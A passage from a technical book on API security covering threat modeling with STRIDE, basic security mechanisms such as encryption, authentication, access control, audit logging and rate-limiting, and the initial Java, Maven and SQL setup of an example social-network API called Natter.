back the encryption of either one or the other. The attacker wins the game if they
can determine which of A or B was given back to them. The system is said to be
secure (for this security goal) if no realistic attacker has better than a 50:50 chance
of guessing correctly.
Not every scenario can be made as precise as those used in cryptography. An alterna-
tive is to refine more abstract security goals into specific requirements that are con-
crete enough to be testable. For example, an instant messaging API might have the
functional requirement that users are able to read their messages. To preserve confidentiality,
you may then add constraints that users are only able to read their own messages and
that a user must be logged in before they can read their messages. In this approach, secu-
rity goals become constraints on existing functional requirements. It then becomes
easier to think up test cases. For example:
Create two users and populate their accounts with dummy messages.
Check that the first user cannot read the messages of the second user.
Check that a user that has not logged in cannot read any messages.
There is no single correct way to break down a security goal into specific require-
ments, and so the process is always one of iteration and refinement as the constraints
become clearer over time, as shown in figure 1.5. After identifying assets and defining
security goals, you break down those goals into testable constraints. Then as you
implement and test those constraints, you may identify new assets to be protected. For
A
B
Encrypt
Key
Attacker
A or B?
Random choice
Figure 1.4
The indistinguishability game used to define confidentiality in
cryptography. The attacker is allowed to submit two equal-length messages, A and
B. The system then picks one at random and encrypts it using the key. The system
is secure if no “efficient” challenger can do much better than guesswork to know
whether they received the encryption of message A or B.
16
CHAPTER 1
What is API security?
example, after implementing your login system, you may give each user a unique tem-
porary session cookie. This session cookie is itself a new asset that should be pro-
tected. Session cookies are discussed in chapter 4.
This iterative process shows that security is not a one-off process that can be signed
off once and then forgotten about. Just as you wouldn’t test the performance of an
API only once, you should revisit security goals and assumptions regularly to make
sure they are still valid.
1.4.3
Environments and threat models
A good definition of API security must also consider the environment in which your
API is to operate and the potential threats that will exist in that environment. A
threat is simply any way that a security goal might be violated with respect to one or
more of your assets. In a perfect world, you would be able to design an API that
achieved its security goals against any threat. But the world is not perfect, and it is
rarely possible or economical to prevent all attacks. In some environments some
threats are just not worth worrying about. For example, an API for recording race
times for a local cycling club probably doesn’t need to worry about the attentions of
a nation-state intelligence agency, although it may want to prevent riders trying to
“improve” their own best times or alter those of other cyclists. By considering realis-
tic threats to your API you can decide where to concentrate your efforts and identify
gaps in your defenses.
Identify
assets
Define security
goals
Refine into security
constraints
Develop and test
Figure 1.5
Defining security for your API consists of a four-step
iterative process of identifying assets, defining the security goals
that you need to preserve for those assets, and then breaking those
down into testable implementation constraints. Implementation may
then identify new assets or goals and so the process continues.
17
Elements of API security
DEFINITION
A threat is an event or set of circumstances that defeats the secu-
rity goals of your API. For example, an attacker stealing names and address
details from your customer database is a threat to confidentiality.
The set of threats that you consider relevant to your API is known as your threat model,
and the process of identifying them is known as threat modeling.
DEFINITION
Threat modeling is the process of systematically identifying threats
to a software system so that they can be recorded, tracked, and mitigated.
There is a famous quote attributed to Dwight D. Eisenhower:
Plans are worthless, but planning is everything.
It is often like that with threat modeling. It is less important exactly how you do threat
modeling or where you record the results. What matters is that you do it, because the
process of thinking about threats and weaknesses in your system will almost always
improve the security of the API.
There are many ways to do threat modeling, but the general process is as follows:
1
Draw a system diagram showing the main logical components of your API.
2
Identify trust boundaries between parts of the system. Everything within a trust
boundary is controlled and managed by the same owner, such as a private data-
center or a set of processes running under a single operating system user.
3
Draw arrows to show how data flows between the various parts of the system.
4
Examine each component and data flow in the system and try to identify threats
that might undermine your security goals in each case. Pay particular attention
to flows that cross trust boundaries. (See the next section for how to do this.)
5
Record threats to ensure they are tracked and managed.
The diagram produced in steps one to three is known as a dataflow diagram, and an
example for a fictitious pizza ordering API is given in figure 1.6. The API is accessed
by a web application running in a web browser, and also by a native mobile phone app,
so these are both drawn as processes in their own trust boundaries. The API server
runs in the same datacenter as the database, but they run as different operating system
accounts so you can draw further trust boundaries to make this clear. Note that the
operating system account boundaries are nested inside the datacenter trust boundary.
For the database, I’ve drawn the database management system (DBMS) process sepa-
rately from the actual data files. It’s often useful to consider threats from users that
have direct access to files separately from threats that access the DBMS API because
these can be quite different.
IDENTIFYING THREATS
If you pay attention to cybersecurity news stories, it can sometimes seem that there are
a bewildering variety of attacks that you need to defend against. While this is partly
true, many attacks fall into a few known categories. Several methodologies have been
18
CHAPTER 1
What is API security?
developed to try to systematically identify threats to software systems, and we can use
these to identify the kinds of threats that might befall your API. The goal of threat
modeling is to identify these general threats, not to enumerate every possible attack.
One very popular methodology is known by the acronym STRIDE, which stands for:
Spoofing—Pretending to be somebody else
Tampering—Altering data, messages, or settings you’re not supposed to alter
Repudiation—Denying that you did something that you really did do
Information disclosure—Revealing information that should be kept private
Denial of service—Preventing others from accessing information and services
Elevation of privilege—Gaining access to functionality you’re not supposed to
have access to
Each initial in the STRIDE acronym represents a class of threat to your API. General
security mechanisms can effectively address each class of threat. For example, spoof-
ing threats, in which somebody pretends to be somebody else, can be addressed by
requiring all users to authenticate. Many common threats to API security can be elim-
inated entirely (or at least significantly mitigated) by the consistent application of a
few basic security mechanisms, as you’ll see in chapter 3 and the rest of this book.
LEARN ABOUT IT
You can learn more about STRIDE, and how to identify spe-
cific threats to your applications, through one of many good books about
threat modeling. I recommend Adam Shostack’s Threat Modeling: Designing for
Security (Wiley, 2014) as a good introduction to the subject.
Datacenter cluster
API user account
Smartphone
Web browser
Database user account
Web
app
Mobile
app
Pizza ordering
API
DBMS
Data
Internal processes
Data store
External process
Trust boundaries
Figure 1.6
An example dataflow diagram, showing processes, data stores and the flow of
data between them. Trust boundaries are marked with dashed lines. Internal processes are
marked with rounded rectangles, while external entities use squared ends. Note that we
include both the database management system (DBMS) process and its data files as
separate entities.
19
Security mechanisms
1.5
Security mechanisms
Threats can be countered by applying security mechanisms that ensure that particular
security goals are met. In this section we will run through the most common security
mechanisms that you will generally find in every well-designed API:
Encryption ensures that data can’t be read by unauthorized parties, either when
it is being transmitted from the API to a client or at rest in a database or filesys-
tem. Modern encryption also ensures that data can’t be modified by an attacker.
Authentication is the process of ensuring that your users and clients are who they
say they are.
Access control (also known as authorization) is the process of ensuring that every
request made to your API is appropriately authorized.
Audit logging is used to ensure that all operations are recorded to allow account-
ability and proper monitoring of the API.
Rate-limiting is used to prevent any one user (or group of users) using all of the
resources and preventing access for legitimate users.
Figure 1.7 shows how these five processes are typically layered as a series of filters that
a request passes through before it is processed by the core logic of your API. As dis-
cussed in section 1.3.1, each of these five stages can sometimes be outsourced to an
external component such as an API gateway. In this book, you will build each of them
from scratch so that you can assess when an external component may be an appropri-
ate choice.
Pop quiz
3
What do the initials CIA stand for when talking about security goals?
4
Which one of the following data flows should you pay the most attention to when
threat modeling?
a
Data flows within a web browser
b
Data flows that cross trust boundaries
c
Data flows between internal processes
d
Data flows between external processes
e
Data flows between a database and its data files
5
Imagine the following scenario: a rogue system administrator turns off audit log-
ging before performing actions using an API. Which of the STRIDE threats are
being abused in this case? Recall from section 1.1 that an audit log records who
did what on the system.
The answers are at the end of the chapter.
20
CHAPTER 1
What is API security?
1.5.1
Encryption
The other security mechanisms discussed in this section deal with protecting access to
data through the API itself. Encryption is used to protect data when it is outside your
API. There are two main cases in which data may be at risk:
Requests and responses to an API may be at risk as they travel over networks,
such as the internet. Encrypting data in transit is used to protect against these
threats.
Data may be at risk from people with access to the disk storage that is used for
persistence. Encrypting data at rest is used to protect against these threats.
TLS should be used to encrypt data in transit and is covered in chapter 3. Alternatives
to TLS for constrained devices are discussed in chapter 12. Encrypting data at rest is a
complex topic with many aspects to consider and is largely beyond the scope of this
book. Some considerations for database encryption are discussed in chapter 5.
User
Clients
Web browser
Your API
Audit log
Authentication
Access control
Rate-limiting
Mobile app
Security controls
requests when the
API is overloaded.
Authentication ensures
users are who they
say they are.
An audit log records
who did what and when.
Access control decides
whether a request is
allowed or denied.
Rejected
requests
Encryption prevents data
being stolen or modified in
transit or at rest.
HTTPS
Application
logic
Rate-limiting rejects
Figure 1.7
When processing a request, a secure API will apply some standard steps. Requests and
responses are encrypted using the HTTPS protocol. Rate-limiting is applied to prevent DoS attacks.
Then users and clients are identified and authenticated, and a record is made of the access attempt
in an access or audit log. Finally, checks are made to decide if this user should be able to perform this
request. The outcome of the request should also be recorded in the audit log.
21
Security mechanisms
1.5.2
Identification and authentication
Authentication is the process of verifying whether a user is who they say they are. We
are normally concerned with identifying who that user is, but in many cases the easiest
way to do that is to have the client tell us who they are and check that they are telling
the truth.
The driving test story at the beginning of the chapter illustrates the difference
between identification and authentication. When you saw your old friend Alice in the
park, you immediately knew who she was due to a shared history of previous interac-
tions. It would be downright bizarre (not to mention rude) if you asked old friends for
formal identification! On the other hand, when you attended your driving test it was
not surprising that the examiner asked to see your driving license. The examiner has
probably never met you before, and a driving test is a situation in which somebody
might reasonably lie about who they are, for example, to get a more experienced
driver to take the test for them. The driving license authenticates your claim that you
are a particular person, and the examiner trusts it because it is issued by an official
body and is difficult to fake.
Why do we need to identify the users of an API in the first place? You should always
ask this question of any security mechanism you are adding to your API, and the
answer should be in terms of one or more of the security goals that you are trying to
achieve. You may want to identify users for several reasons:
You want to record which users performed what actions to ensure accountability.
You may need to know who a user is to decide what they can do, to enforce con-
fidentiality and integrity goals.
You may want to only process authenticated requests to avoid anonymous DoS
attacks that compromise availability.
Because authentication is the most common method of identifying a user, it is com-
mon to talk of “authenticating a user” as a shorthand for identifying that user via
authentication. In reality, we never “authenticate” a user themselves but rather claims
about their identity such as their username. To authenticate a claim simply means to
determine if it is authentic, or genuine. This is usually achieved by asking the user to
present some kind of credentials that prove that the claims are correct (they provide
credence to the claims, which is where the word “credential” comes from), such as pro-
viding a password along with the username that only that user would know.
AUTHENTICATION FACTORS
There are many ways of authenticating a user, which can be divided into three broad
categories known as authentication factors:
Something you know, such as a secret password
Something you have, like a key or physical device
Something you are. This refers to biometric factors, such as your unique finger-
print or iris pattern.
22
CHAPTER 1
What is API security?
Any individual factor of authentication may be compromised. People choose weak
passwords or write them down on notes attached to their computer screen, and they
mislay physical devices. Although biometric factors can be appealing, they often have
high error rates. For this reason, the most secure authentication systems require two
or more different factors. For example, your bank may require you to enter a pass-
word and then use a device with your bank card to generate a unique login code. This
is known as two-factor authentication (2FA) or multi-factor authentication (MFA).
DEFINITION
Two-factor authentication (2FA) or multi-factor authentication (MFA)
require a user to authenticate with two or more different factors so that a
compromise of any one factor is not enough to grant access to a system.
Note that an authentication factor is different from a credential. Authenticating with
two different passwords would still be considered a single factor, because they are both
based on something you know. On the other hand, authenticating with a password
and a time-based code generated by an app on your phone counts as 2FA because the
app on your phone is something you have. Without the app (and the secret key stored
inside it), you would not be able to generate the codes.
1.5.3
Access control and authorization
In order to preserve confidentiality and integrity of your assets, it is usually necessary
to control who has access to what and what actions they are allowed to perform. For
example, a messaging API may want to enforce that users are only allowed to read
their own messages and not those of anybody else, or that they can only send messages
to users in their friendship group.
NOTE
In this book I’ve used the terms authorization and access control inter-
changeably, because this is how they are often used in practice. Some authors
use the term access control to refer to an overall process including authentica-
tion, authorization, and audit logging, or AAA for short.
There are two primary approaches to access control that are used for APIs:
Identity-based access control first identifies the user and then determines what they
can do based on who they are. A user can try to access any resource but may be
denied access based on access control rules.
Capability-based access control uses special tokens or keys known as capabilities to
access an API. The capability itself says what operations the bearer can perform
rather than who the user is. A capability both names a resource and describes
the permissions on it, so a user is not able to access any resource that they do
not have a capability for.
Chapters 8 and 9 cover these two approaches to access control in detail.
23
Security mechanisms
It is even possible to design applications and their APIs to not need any access control
at all. A wiki is a type of website invented by Ward Cunningham, where users collabo-
rate to author articles about some topic or topics. The most famous wiki is Wikipedia,
the online encyclopedia that is one of the most viewed sites on the web. A wiki is
unusual in that it has no access controls at all. Any user can view and edit any page,
and even create new pages. Instead of access controls, a wiki provides extensive version
control capabilities so that malicious edits can be easily undone. An audit log of edits
provides accountability because it is easy to see who changed what and to revert those
changes if necessary. Social norms develop to discourage antisocial behavior. Even so,
large wikis like Wikipedia often have some explicit access control policies so that arti-
cles can be locked temporarily to prevent “edit wars” when two users disagree strongly
or in cases of persistent vandalism.
1.5.4
Audit logging
An audit log is a record of every operation performed using your API. The purpose of
an audit log is to ensure accountability. It can be used after a security breach as part of
a forensic investigation to find out what went wrong, but also analyzed in real-time by
log analysis tools to identity attacks in progress and other suspicious behavior. A good
audit log can be used to answer the following kinds of questions:
Who performed the action and what client did they use?
When was the request received?
What kind of request was it, such as a read or modify operation?
What resource was being accessed?
Was the request successful? If not, why?
What other requests did they make around the same time?
Capability-based security
The predominant approach to access control is identity-based, where who you are
determines what you can do. When you run an application on your computer, it runs
with the same permissions that you have. It can read and write all the files that you
can read and write and perform all the same actions that you can do. In a capability-
based system, permissions are based on unforgeable references known as capa-
bilities (or keys). A user or an application can only read a file if they hold a capability
that allows them to read that specific file. This is a bit like a physical key that you
use in the real world; whoever holds the key can open the door that it unlocks. Just
like a real key typically only unlocks a single door, capabilities are typically also
restricted to just one object or file. A user may need many capabilities to get their
work done, and capability systems provide mechanisms for managing all these capa-
bilities in a user-friendly way. Capability-based access control is covered in detail in
chapter 9.
24
CHAPTER 1
What is API security?
It’s essential that audit logs are protected from tampering, and they often contain per-
sonally identifiable information that should be kept confidential. You’ll learn more about
audit logging in chapter 3.
DEFINITION
Personally identifiable information, or PII, is any information that
relates to an individual person and can help to identify that person. For
example, their name or address, or their date and place of birth. Many coun-
tries have data protection laws like the GDPR, which strictly control how PII
may be stored and used.
1.5.5
Rate-limiting
The last mechanisms we will consider are for preserving availability in the face of mali-
cious or accidental DoS attacks. A DoS attack works by exhausting some finite resource
that your API requires to service legitimate requests. Such resources include CPU time,
memory and disk usage, power, and so on. By flooding your API with bogus requests,
these resources become tied up servicing those requests and not others. As well as send-
ing large numbers of requests, an attacker may also send overly large requests that con-
sume a lot of memory or send requests very slowly so that resources are tied up for a
long time without the malicious client needing to expend much effort.
The key to fending off these attacks is to recognize that a client (or group of cli-
ents) is using more than their fair share of some resource: time, memory, number of
connections, and so on. By limiting the resources that any one user is allowed to con-
sume, we can reduce the risk of attack. Once a user has authenticated, your applica-
tion can enforce quotas that restrict what they are allowed to do. For example, you
might restrict each user to a certain number of API requests per hour, preventing
them from flooding the system with too many requests. There are often business rea-
sons to do this for billing purposes, as well as security benefits. Due to the application-
specific nature of quotas, we won’t cover them further in this book.
DEFINITION
A quota is a limit on the number of resources that an individual
user account can consume. For example, you may only allow a user to post
five messages per day.
Before a user has logged in you can apply simpler rate-limiting to restrict the number
of requests overall, or from a particular IP address or range. To apply rate-limiting, the
API (or a load balancer) keeps track of how many requests per second it is serving.
Once a predefined limit is reached then the system rejects new requests until the rate
falls back under the limit. A rate-limiter can either completely close connections when
the limit is exceeded or else slow down the processing of requests, a process known as
throttling. When a distributed DoS is in progress, malicious requests will be coming
from many different machines on different IP addresses. It is therefore important to
be able to apply rate-limiting to a whole group of clients rather than individually. Rate-
limiting attempts to ensure that large floods of requests are rejected before the system
is completely overwhelmed and ceases functioning entirely.
25
Answers to pop quiz questions
DEFINITION
Throttling is a process by which a client’s requests are slowed
down without disconnecting the client completely. Throttling can be achieved
either by queueing requests for later processing, or else by responding to the
requests with a status code telling the client to slow down. If the client doesn’t
slow down, then subsequent requests are rejected.
The most important aspect of rate-limiting is that it should use fewer resources than
would be used if the request were processed normally. For this reason, rate-limiting is
often performed in highly optimized code running in an off-the-shelf load balancer,
reverse proxy, or API gateway that can sit in front of your API to protect it from DoS
attacks rather than having to add this code to each API. Some commercial companies
offer DoS protection as a service. These companies have large global infrastructure
that is able to absorb the traffic from a DoS attack and quickly block abusive clients.
In the next chapter, we will get our hands dirty with a real API and apply some of
the techniques we have discussed in this chapter.
Answers to pop quiz questions
1
c, e, and f. While other aspects of security may be relevant to different APIs,
these three disciplines are the bedrock of API security.
2
d. An API gateway is a specialized type of reverse proxy.
3
Confidentiality, Integrity, and Availability.
4
b. Data flows that cross trust boundaries are the most likely place for threats to
occur. APIs often exist at trust boundaries.
5
Repudiation. By disabling audit logging, the rogue system administrator will later
be able to deny performing actions on the system as there will be no record.
Pop quiz
6
Which of the STRIDE threats does rate-limiting protect against?
a
Spoofing
b
Tampering
c
Repudiation
d
Information disclosure
e
Denial of service
f
Elevation of privilege
7
The WebAuthn standard (https://www.w3.org/TR/webauthn/) allows hardware
security keys to be used by a user to authenticate to a website. Which of the
three authentication factors from section 1.5.1 best describes this method of
authentication?
The answers are at the end of the chapter.
26
CHAPTER 1
What is API security?
6
e. Rate-limiting primarily protects against denial of service attacks by preventing
a single attacker from overloading the API with requests.
7
A hardware security key is something you have. They are usually small devices
that can be plugged into a USB port on your laptop and can be attached to
your key ring.
Summary
You learned what an API is and the elements of API security, drawing on aspects
of information security, network security, and application security.
You can define security for your API in terms of assets and security goals.
The basic API security goals are confidentiality, integrity, and availability, as well
as accountability, privacy, and others.
You can identify threats and assess risk using frameworks such as STRIDE.
Security mechanisms can be used to achieve your security goals, including encryp-
tion, authentication, access control, audit logging, and rate-limiting.
27
Secure API development
I’ve so far talked about API security in the abstract, but in this chapter, you’ll dive in
and look at the nuts and bolts of developing an example API. I’ve written many APIs
in my career and now spend my days reviewing the security of APIs used for critical
security operations in major corporations, banks, and multinational media organiza-
tions. Although the technologies and techniques vary from situation to situation and
from year to year, the fundamentals remain the same. In this chapter you’ll learn how
to apply basic secure development principles to API development, so that you can
build more advanced security measures on top of a firm foundation.
2.1
The Natter API
You’ve had the perfect business idea. What the world needs is a new social network.
You’ve got the name and the concept: Natter—the social network for coffee morn-
ings, book groups, and other small gatherings. You’ve defined your minimum viable
This chapter covers
Setting up an example API project
Understanding secure development principles
Identifying common attacks against APIs
Validating input and producing safe output
28
CHAPTER 2
Secure API development
product, somehow received some funding, and now need to put together an API and
a simple web client. You’ll soon be the new Mark Zuckerberg, rich beyond your dreams,
and considering a run for president.
Just one small problem: your investors are worried about security. Now you must
convince them that you’ve got this covered, and that they won’t be a laughing stock on
launch night or faced with hefty legal liabilities later. Where do you start?
Although this scenario might not be much like anything you’re working on, if
you’re reading this book the chances are that at some point you’ve had to think about
the security of an API that you’ve designed, built, or been asked to maintain. In this
chapter, you’ll build a toy API example, see examples of attacks against that API, and
learn how to apply basic secure development principles to eliminate those attacks.
2.1.1
Overview of the Natter API
The Natter API is split into two REST endpoints, one for normal users and one for mod-
erators who have special privileges to tackle abusive behavior. Interactions between
users are built around a concept of social spaces, which are invite-only groups. Anyone
can sign up and create a social space and then invite their friends to join. Any user in
the group can post a message to the group, and it can be read by any other member of
the group. The creator of a space becomes the first moderator of that space.
The overall API deployment is shown in figure 2.1. The two APIs are exposed over
HTTP and use JSON for message content, for both mobile and web clients. Connec-
tions to the shared database use standard SQL over Java’s JDBC API.
Natter API
Moderation API
HTTP
SQL
Clients
The Natter API handles
creation of social spaces
and keeping track of
messages within a space.
The Moderation API allows
privileged users (moderators)
to delete offensive messages.
The database stores
messages and social
space metadata.
Message
database
Web UI
Mobile UI
Figure 2.1
Natter exposes two APIs—one for normal users and one for moderators. For
simplicity, both share the same database. Mobile and web clients communicate with the
API using JSON over HTTP, although the APIs communicate with the database using SQL
over JDBC.
29
The Natter API
The Natter API offers the following operations:
A HTTP POST request to the /spaces URI creates a new social space. The user
that performs this POST operation becomes the owner of the new space. A
unique identifier for the space is returned in the response.
Users can add messages to a social space by sending a POST request to /spaces/
<spaceId>/messages where <spaceId> is the unique identifier of the space.
The messages in a space can be queried using a GET request to /spaces/
<spaceId>/messages. A since=<timestamp> query parameter can be used to
limit the messages returned to a recent period.
Finally, the details of individual messages can be obtained using a GET request
to /spaces/<spaceId>/messages/<messageId>.
The moderator API contains a single operation to delete a message by sending a
DELETE request to the message URI. A Postman collection to help you use the API is
available from https://www.getpostman.com/collections/ef49c7f5cba0737ecdfd. To
import the collection in Postman, go to File, then Import, and select the Link tab.
Then enter the link, and click Continue.
TIP
Postman (https://www.postman.com) is a widely used tool for exploring
and documenting HTTP APIs. You can use it to test examples for the APIs
developed in this book, but I also provide equivalent commands using simple
tools throughout the book.
In this chapter, you will implement just the operation to create a new social space.
Operations for posting messages to a space and reading messages are left as an exer-
cise. The GitHub repository accompanying the book (https://github.com/NeilMadden/
apisecurityinaction) contains sample implementations of the remaining operations in
the chapter02-end branch.
2.1.2
Implementation overview
The Natter API is written in Java 11 using the Spark Java (http://sparkjava.com)
framework (not to be confused with the Apache Spark data analytics platform). To
make the examples as clear as possible to non-Java developers, they are written in a
simple style, avoiding too many Java-specific idioms. The code is also written for clarity
and simplicity rather than production-readiness. Maven is used to build the code
examples, and an H2 in-memory database (https://h2database.com) is used for data
storage. The Dalesbred database abstraction library (https://dalesbred.org) is used to
provide a more convenient interface to the database than Java’s JDBC interface, with-
out bringing in the complexity of a full object-relational mapping framework.
Detailed instructions on installing these dependencies for Mac, Windows, and
Linux are in appendix A. If you don’t have all or any of these installed, be sure you
have them ready before you continue.
30
CHAPTER 2
Secure API development
TIP
For the best learning experience, it is a good idea to type out the listings
in this book by hand, so that you are sure you understand every line. But if
you want to get going more quickly, the full source code of each chapter is
available on GitHub from https://github.com/NeilMadden/apisecurityin-
action. Follow the instructions in the README.md file to get set up.
2.1.3
Setting up the project
Use Maven to generate the basic project structure, by running the following com-
mand in the folder where you want to create the project:
mvn archetype:generate \
➥ -DgroupId=com.manning.apisecurityinaction \
➥ -DartifactId=natter-api \
➥ -DarchetypeArtifactId=maven-archetype-quickstart \
➥ -DarchetypeVersion=1.4 -DinteractiveMode=false
If this is the first time that you’ve used Maven, it may take some time as it downloads
the dependencies that it needs. Once it completes, you’ll be left with the following
project structure, containing the initial Maven project file (pom.xml), and an App
class and AppTest unit test class under the required Java package folder structure.
natter-api
├── pom.xml
└── src
├── main
│ └── java
│ └── com
│ └── manning
│ └── apisecurityinaction
│ └── App.java
└── test
└── java
└── com
└── manning
└── apisecurityinaction
└── AppTest.java
You first need to replace the generated Maven project file with one that lists the
dependencies that you’ll use. Locate the pom.xml file and open it in your favorite edi-
tor or IDE. Select the entire contents of the file and delete it, then paste the contents
of listing 2.1 into the editor and save the new file. This ensures that Maven is config-
ured for Java 11, sets up the main class to point to the Main class (to be written
shortly), and configures all the dependencies you need.
NOTE
At the time of writing, the latest version of the H2 database is 1.4.200,
but this version causes some errors with the examples in this book. Please use
version 1.4.197 as shown in the listing.
The Maven
project file
The sample Java class
generated by Maven
A sample unit
test file
31
The Natter API
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>com.manning.api-security-in-action</groupId>
<artifactId>natter-api</artifactId>
<version>1.0.0-SNAPSHOT</version>
<properties>
<maven.compiler.source>11</maven.compiler.source>
<maven.compiler.target>11</maven.compiler.target>
<exec.mainClass>
com.manning.apisecurityinaction.Main
</exec.mainClass>
</properties>
<dependencies>
<dependency>
<groupId>com.h2database</groupId>
<artifactId>h2</artifactId>
<version>1.4.197</version>
</dependency>
<dependency>
<groupId>com.sparkjava</groupId>
<artifactId>spark-core</artifactId>
<version>2.9.2</version>
</dependency>
<dependency>
<groupId>org.json</groupId>
<artifactId>json</artifactId>
<version>20200518</version>
</dependency>
<dependency>
<groupId>org.dalesbred</groupId>
<artifactId>dalesbred</artifactId>
<version>1.3.2</version>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-simple</artifactId>
<version>1.7.30</version>
</dependency>
</dependencies>
</project>
You can now delete the App.java and AppTest.java files, because you’ll be writing new
versions of these as we go.
Listing 2.1
pom.xml
Configure Maven
for Java 11.
Set the main class
for running the
sample code.
Include the latest
stable versions of H2,
Spark, Dalesbred,
and JSON.org.
Include slf4j to
enable debug
logging for Spark.
32
CHAPTER 2
Secure API development
2.1.4
Initializing the database
To get the API up and running, you’ll need a database to store the messages that
users send to each other in a social space, as well as the metadata about each social
space, such as who created it and what it is called. While a database is not essential for
this example, most real-world APIs will use one to store data, and so we will use one
here to demonstrate secure development when interacting with a database. The
schema is very simple and shown in figure 2.2. It consists of just two entities: social
spaces and messages. Spaces are stored in the spaces database table, along with the
name of the space and the name of the owner who created it. Messages are stored in
the messages table, with a reference to the space they are in, as well as the message
content (as text), the name of the user who posted the message, and the time at which
it was created.
Using your favorite editor or IDE, create a file schema.sql under natter-api/src/main/
resources and copy the contents of listing 2.2 into it. It includes a table named spaces
for keeping track of social spaces and their owners. A sequence is used to allocate
unique IDs for spaces. If you haven’t used a sequence before, it’s a bit like a special
table that returns a new value every time you read from it.
Another table, messages, keeps track of individual messages sent to a space, along
with who the author was, when it was sent, and so on. We index this table by time, so
that you can quickly search for new messages that have been posted to a space since a
user last logged on.
Space
Message
space_id
name
owner
author
msg_time
msg_txt
A space represents
a social space in
the Natter API.
Messages within a space
are represented by the
messages table.
Attributes of a message
include the name of the
author, the time and
the contents.
Spaces and messages
have unique ids created
automatically from a
database sequence.
A space can have
many messages, but
each message is in
exactly one space.
msg_id
space_id
Figure 2.2
The Natter database schema consists of social spaces and messages within those
spaces. Spaces have an owner and a name, while messages have an author, the text of the message,
and the time at which the message was sent. Unique IDs for messages and spaces are generated
automatically using SQL sequences.
33
The Natter API
CREATE TABLE spaces(
space_id INT PRIMARY KEY,
name VARCHAR(255) NOT NULL,
owner VARCHAR(30) NOT NULL
);
CREATE SEQUENCE space_id_seq;
CREATE TABLE messages(
space_id INT NOT NULL REFERENCES spaces(space_id),
msg_id INT PRIMARY KEY,
author VARCHAR(30) NOT NULL,
msg_time TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP,
msg_text VARCHAR(1024) NOT NULL
);
CREATE SEQUENCE msg_id_seq;
CREATE INDEX msg_timestamp_idx ON messages(msg_time);
CREATE UNIQUE INDEX space_name_idx ON spaces(name);
Fire up your editor again and create the file Main.java under natter-api/src/main/
java/com/manning/apisecurityinaction (where Maven generated the App.java for
you earlier). The following listing shows the contents of this file. In the main method,
you first create a new JdbcConnectionPool object. This is a H2 class that implements
the standard JDBC DataSource interface, while providing simple pooling of connec-
tions internally. You can then wrap this in a Dalesbred Database object using the
Database.forDataSource() method. Once you’ve created the connection pool, you
can then load the database schema from the schema.sql file that you created earlier.
When you build the project, Maven will copy any files in the src/main/resources file
into the .jar file it creates. You can therefore use the Class.getResource() method to
find the file from the Java classpath, as shown in listing 2.3.
package com.manning.apisecurityinaction;
import java.nio.file.*;
import org.dalesbred.*;
import org.h2.jdbcx.*;
import org.json.*;
public class Main {
public static void main(String... args) throws Exception {
var datasource = JdbcConnectionPool.create(
"jdbc:h2:mem:natter", "natter", "password");
var database = Database.forDataSource(datasource);
createTables(database);
}
private static void createTables(Database database)
throws Exception {
Listing 2.2
The database schema: schema.sql
Listing 2.3
Setting up the database connection pool
The spaces table describes who
owns which social spaces.
We use sequences to ensure
uniqueness of primary keys.
The messages
table contains the
actual messages.
We index messages
by timestamp to
allow catching up on
recent messages.
Create a JDBC
DataSource object
for the in-memory
database.
34
CHAPTER 2
Secure API development
var path = Paths.get(
Main.class.getResource("/schema.sql").toURI());
database.update(Files.readString(path));
}
}
2.2
Developing the REST API
Now that you’ve got the database in place, you can start to write the actual REST APIs
that use it. You’ll flesh out the implementation details as we progress through the
chapter, learning secure development principles as you go.
Rather than implement all your application logic directly within the Main class,
you’ll extract the core operations into several controller objects. The Main class will
then define mappings between HTTP requests and methods on these controller
objects. In chapter 3, you will add several security mechanisms to protect your API,
and these will be implemented as filters within the Main class without altering the con-
troller objects. This is a common pattern when developing REST APIs and makes the
code a bit easier to read as the HTTP-specific details are separated from the core logic
of the API. Although you can write secure code without implementing this separation,
it is much easier to review security mechanisms if they are clearly separated rather
than mixed into the core logic.
DEFINITION
A controller is a piece of code in your API that responds to requests
from users. The term comes from the popular model-view-controller (MVC)
pattern for constructing user interfaces. The model is a structured view of
data relevant to a request, while the view is the user interface that displays that
data to the user. The controller then processes requests made by the user and
updates the model appropriately. In a typical REST API, there is no view com-
ponent beyond simple JSON formatting, but it is still useful to structure your
code in terms of controller objects.
2.2.1
Creating a new space
The first operation you’ll implement is to allow a user to create a new social space,
which they can then claim as owner. You’ll create a new SpaceController class that
will handle all operations related to creating and interacting with social spaces. The
controller will be initialized with the Dalesbred Database object that you created in
listing 2.3. The createSpace method will be called when a user creates a new social
space, and Spark will pass in a Request and a Response object that you can use to
implement the operation and produce a response.
The code follows the general pattern of many API operations.
1
First, we parse the input and extract variables of interest.
2
Then we start a database transaction and perform any actions or queries requested.
3
Finally, we prepare a response, as shown in figure 2.3.
Load table
definitions from
schema.sql.
35
Developing the REST API
In this case, you’ll use the json.org library to parse the request body as JSON and
extract the name and owner of the new space. You’ll then use Dalesbred to start a
transaction against the database and create the new space by inserting a new row into
the spaces database table. Finally, if all was successful, you’ll create a 201 Created
response with some JSON describing the newly created space. As is required for a
HTTP 201 response, you will set the URI of the newly created space in the Location
header of the response.
Navigate to the Natter API project you created and find the src/main/java/com/
manning/apisecurityinaction folder. Create a new sub-folder named “controller”
under this location. Then open your text editor and create a new file called Space-
Controller.java in this new folder. The resulting file structure should look as follows,
with the new items highlighted in bold:
natter-api
├── pom.xml
└── src
├── main
│ └── java
│ └── com
│ └── manning
│ └── apisecurityinaction
│ ├── Main.java
│ └── controller
│ └── SpaceController.java
└── test
└── …
Open the SpaceController.java file in your editor again and type in the contents of list-
ing 2.4 and click Save.
WARNING
The code as written contains a serious security vulnerability, known
as an SQL injection vulnerability. You’ll fix that in section 2.4. I’ve marked the
broken line of code with a comment to make sure you don’t accidentally copy
this into a real application.
Parse
input
Perform
operation
Prepare
output
Figure 2.3
An API operation can generally be separated into three phases:
first we parse the input and extract variables of interest, then we perform
the actual operation, and finally we prepare some output that indicates the
status of the operation.
36
CHAPTER 2
Secure API development
package com.manning.apisecurityinaction.controller;
import org.dalesbred.Database;
import org.json.*;
import spark.*;
public class SpaceController {
private final Database database;
public SpaceController(Database database) {
this.database = database;
}
